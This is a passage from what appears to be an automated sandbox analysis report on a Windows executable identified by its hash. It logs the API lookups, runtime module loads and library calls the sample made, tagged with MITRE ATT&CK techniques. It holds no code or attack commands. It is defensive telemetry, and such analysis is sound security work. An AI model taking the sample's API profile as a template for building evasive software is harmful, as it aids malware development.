\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SHGetValueA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RtlConvertSidToUnicodeString (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegDeleteTreeW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter StringFromIID (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NsiAllocateAndGetTable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CM_Open_Class_Key_ExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ConvertInterfaceGuidToLuid (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetIfEntry2 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetIpForwardTable2 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetIpNetEntry2 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeMibTable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NsiFreeTable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariable (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetEvent (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ResetEvent (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpGetProxyForUrl (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpGetProxyForUrlW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcAsyncInitializeHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenServiceW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter StartServiceW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NdrAsyncClientCall (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcAsyncCompleteCall (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetDynamicTimeZoneInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileMUIPath (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LoadLibraryEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeLibraryW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetNetworkParams (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetAddrInfoW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter freeaddrinfo (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WSAConnect (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter send (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter recv (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NtQueryInformationThread (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateWaitableTimerExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetWaitableTimerEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EnumerateSecurityPackagesW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeContextBuffer (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeCredentialsHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AcquireCredentialsHandleW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter DeleteSecurityContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityContextW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter QueryContextAttributesW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter shutdown (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter DllGetClassObject (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptReleaseContext (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00003656)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"GDI32.DLL\" at base 75c30000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 758c0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70c70000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"KERNEL32\" at base 75d30000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c9b0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"ADVAPI32.DLL\" at base 75c80000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREEI.DLL\" at base 6bca0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"SHLWAPI.DLL\" at base 77550000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-2.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-APPMODEL-RUNTIME-L1-1-0.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"VERSION.DLL\" at base 749d0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLR.DLL\" at base 69740000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"USER32.DLL\" at base 773d0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-CORE-QUIRKS-L1-1-0.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\MSCOREE.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"MSCOREE.DLL\" at base 6cb10000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\COMBASE.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"PSAPI.DLL\" at base 758e0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"RPCRT4.DLL\" at base 774a0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"KERNEL32.DLL\" at base 75d30000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\MSCORLIB\\36EACCFDE177C2E7B93B8DBDDE4E012A\\MSCORLIB.NI.DLL\" at base 642f0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\OLE32.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"OLE32.DLL\" at base 76d20000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"CRYPTBASE.DLL\" at base 75430000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-CORE-XSTATE-L2-1-0.DLL\" at base 6cba0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\CLRJIT.DLL\" at base 6bb60000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"CRYPTSP.DLL\" at base 74f40000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74cd0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM\\2C3C912EA8F058F9D04C4650128FEB3F\\SYSTEM.NI.DLL\" at base 68ce0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\SHELL32.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"SHELL32.DLL\" at base 760c0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.DRAWING\\F7568D7F1B9D356F64779B4C0927CFB3\\SYSTEM.DRAWING.NI.DLL\" at base 6a3c0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.WINDOWS.FORMS\\C9A4CBC00F690A9E3CDDFC400F6E85BB\\SYSTEM.WINDOWS.FORMS.NI.DLL\" at base 63480000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CORE\\31FAE3290FAD30C31C98651462D22724\\SYSTEM.CORE.NI.DLL\" at base 62c60000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.CONFIGURATION\\96F7EDB07B12303F0EC2595C7F3778C7\\SYSTEM.CONFIGURATION.NI.DLL\" at base 6ba50000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\ASSEMBLY\\NATIVEIMAGES_V4.0.30319_32\\SYSTEM.XML\\15AF16D373CF0528CB74FC73D365FDBF\\SYSTEM.XML.NI.DLL\" at base 624e0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\NLSSORTING.DLL\" at base 6c1b0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"NTDLL.DLL\" at base 77630000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 77860000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"PROFAPI.DLL\" at base 75540000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_32\\MSCORLIB\\V4.0_4.0.0.0__B77A5C561934E089\\BCRYPT.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"BCRYPT.DLL\" at base 75050000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\PSAPI.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\RASAPI32.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"RASAPI32.DLL\" at base 6c470000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"RTUTILS.DLL\" at base 73340000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 77860000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-SERVICE-WINSVC-L1-1-0.DLL\" at base 77860000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WS2_32.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"WS2_32.DLL\" at base 75870000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74f00000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74a60000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHIP6.DLL\" at base 74ef0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"RASMAN.DLL\" at base 6cbc0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\WINHTTP.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"WINHTTP.DLL\" at base 71010000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"SSPICLI.DLL\" at base 753c0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"CREDSSP.DLL\" at base 74c00000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"IPHLPAPI.DLL\" at base 73890000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"DHCPCSVC6.DLL\" at base 737a0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"DHCPCSVC.DLL\" at base 73720000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"NSI.DLL\" at base 77780000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"CFGMGR32.DLL\" at base 75780000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"OLEAUT32.DLL\" at base 777c0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 77860000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\IPHLPAPI.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"DNSAPI.DLL\" at base 74dc0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"RASADHLP.DLL\" at base 71cc0000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73800000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\ASSEMBLY\\GAC_MSIL\\SYSTEM\\V4.0_4.0.0.0__B77A5C561934E089\\SECUR32.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"SECUR32.DLL\" at base 75270000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SCHANNEL.DLL\" at base 74d40000\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\VERSION.DLL\" at base 0\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" loaded module \"%WINDIR%\\MICROSOFT.NET\\FRAMEWORK\\V4.0.30319\\DIASYMREADER.DLL\" at base 68ab0000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"100011000e03b56c@ADVAPI32.dll\"\n \"15001600c03ed76b@ADVAPI32.dll\"\n \"0e000f00703fd76b@ADVAPI32.dll\"\n \"0e000f00cc3fd76b@ADVAPI32.dll\"\n \"11001200b447d76b@ADVAPI32.dll\"\n \"110012004848d76b@ADVAPI32.dll\"\n \"120013008c48d76b@ADVAPI32.dll\"\n \"12001300e448d76b@ADVAPI32.dll\"\n \"14001500386ed76b@ADVAPI32.dll\"\n \"14001500506ed76b@ADVAPI32.dll\"\n \"14001500686ed76b@ADVAPI32.dll\"\n \"17001800806ed76b@ADVAPI32.dll\"\n \"0d000e00986ed76b@ADVAPI32.dll\"\n \"11001200a86ed76b@ADVAPI32.dll\"\n \"11001200bc6ed76b@ADVAPI32.dll\"\n \"0f001000fc6fd76b@ADVAPI32.dll\"\n \"140015003c70d76b@ADVAPI32.dll\"\n \"140015005470d76b@ADVAPI32.dll\"\n \"0c000d009c70d76b@ADVAPI32.dll\"\n \"0c000d00ac70d76b@ADVAPI32.dll\"\n \"0e000f00bc70d76b@ADVAPI32.dll\"\n \"0e000f00cc70d76b@ADVAPI32.dll\"\n \"0b000c00dc70d76b@ADVAPI32.dll\"\n \"180019001473d76b@RPCRT4.dll\"\n \"130014004073d76b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-2.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-appmodel-runtime-l1-1-0.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter VERSION.dll (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll (UID: 00000000-00003656)\n 